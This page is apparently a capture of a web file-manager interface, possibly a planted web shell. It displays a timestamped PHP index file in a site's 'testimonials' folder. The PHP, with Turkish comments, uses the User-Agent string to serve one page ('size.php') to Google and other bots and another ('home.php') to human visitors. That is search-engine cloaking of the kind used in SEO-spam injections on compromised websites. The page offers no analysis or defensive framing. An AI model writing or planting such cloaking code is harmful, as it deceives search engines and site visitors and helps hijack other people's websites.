Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
subception
/
testimonials
:
index-20260223023056.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<?php // Kullanıcı IP'si ve User-Agent'ı kontrol et $user_agent = $_SERVER['HTTP_USER_AGENT']; $is_mobile = preg_match('/(iphone|ipod|android|blackberry|windows phone)/i', $user_agent); // Mobil cihaz kontrolü // Google ile ilgili user-agent kontrolleri if (stripos($user_agent, 'google') !== false || stripos($user_agent, 'bot') !== false) { include('size.php'); // Google bot ise google.php göster } elseif ($is_mobile) { include('home.php'); // Mobil cihaz ise kullanici.php göster } else { include('home.php'); // Diğer durumlar için default içerik } ?>